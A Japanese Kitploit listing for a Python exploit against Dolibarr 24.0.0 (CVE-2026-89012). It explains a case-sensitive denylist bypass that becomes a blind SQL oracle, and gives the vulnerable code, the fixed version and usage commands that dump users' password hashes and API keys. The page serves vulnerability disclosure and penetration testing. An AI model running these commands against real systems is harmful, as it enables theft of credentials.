Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-89012 — CVE-2026-89012 用の Python エクスプロイト。Dolibarr の SQL フィルタ拒否リストをバイパスし、ブラインドブールオラクルを用いて REST API 経由でパスワードハッシュと API キーを抽出します。 | Kitploit
ツール/GitHubGitHub/faceless0x7/cve-2026-89012
パスワードクラッキング脆弱性分析エクスプロイトウェブアプリケーション悪用データ流出情報収集ウェブセキュリティペネトレーションテストAPIセキュリティ
GitHubfaceless0x7/cve-2026-89012

CVE-2026-89012

CVE-2026-89012 用の Python エクスプロイト。Dolibarr の SQL フィルタ拒否リストをバイパスし、ブラインドブールオラクルを用いて REST API 経由でパスワードハッシュと API キーを抽出します。

116時間7分前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
リポジトリを見る

CVE-2026-89012 — Dolibarr SQLフィルタ拒否リストバイパス

CVE-2026-89012のエクスプロイト: forgeSQLFromUniversalSearchCriteria() における 禁止フィールド拒否リスト(CVE-2026-71510の修正で導入された)は、 大文字小文字を区別する in_array() を使用している一方、オペランドの文字セットは A-Z を許可している。SQLのカラム解決は大文字小文字を区別しないため、 認証済みAPIユーザーは t.pass_crypted の代わりに t.PASS_CRYPTED を クエリすることで拒否リストをバイパスできる。 LIKE 述語をプレフィックスとして付けると、sqlfilters がブラインド真偽オラクルに変わり、 パスワードハッシュを1文字ずつ復元できる。

レコード: https://www.cve.org/CVERecord?id=CVE-2026-89012

影響を受けるバージョンDolibarr 24.0.0
修正済み24.0.1
前提条件users->lire を持つ有効なAPIトークン
影響pass_crypted、api_key、pass、pass_temp、openid の漏洩

根本原因

root@kitploit:~
// htdocs/core/lib/functions.lib.php, 24.0.0 line 16306
$operandwithoutprefix = preg_replace('/^[a-z0-9_]+\./i', '', $operand);
if (in_array($operandwithoutprefix, $newforbiddenfields)) {  // case-sensitive
    return '1=1';
}

使用方法

root@kitploit:~
# detection (safe, 3 requests)
python3 CVE-2026-89012.py https://erp.local/api/index.php/users --apikey KEY check

# list readable users
python3 CVE-2026-89012.py https://erp.local/api/index.php/users --apikey KEY users

# extract pass_crypted for every user (threaded oracle)
python3 CVE-2026-89012.py https://erp.local/api/index.php/users --apikey KEY dump

# single target / other protected column
python3 CVE-2026-89012.py https://erp.local/api/index.php/users --apikey KEY dump --login admin
python3 CVE-2026-89012.py https://erp.local/api/index.php/users --apikey KEY dump --column API_KEY --charset hex

標準ライブラリのみ(Python 3.8+)。--proxy、--insecure、--timeout をサポート。

注記: 大文字小文字を区別しない照合順序(デフォルト)では、bcrypt値は 文字の大文字小文字まで正確に復元される。平文カラム(/api/index.php/members 経由の llx_adherent.pass、pass_temp)はバイト単位で正確に復元される。

demo

参考文献

  • CVEレコード: https://www.cve.org/CVERecord?id=CVE-2026-89012
  • 修正済みリリース: https://github.com/Dolibarr/dolibarr/releases/tag/24.0.1
  • パッチコミット: https://github.com/Dolibarr/dolibarr/commit/7a04d9c970e45e15d29c91e6f5a34a262c6c51c8

免責事項

許可されたテストおよび研究のみを目的としています。自身が所有するシステム、 またはテストの明示的な許可を得たシステムに対してのみ使用してください。

ツールをダウンロード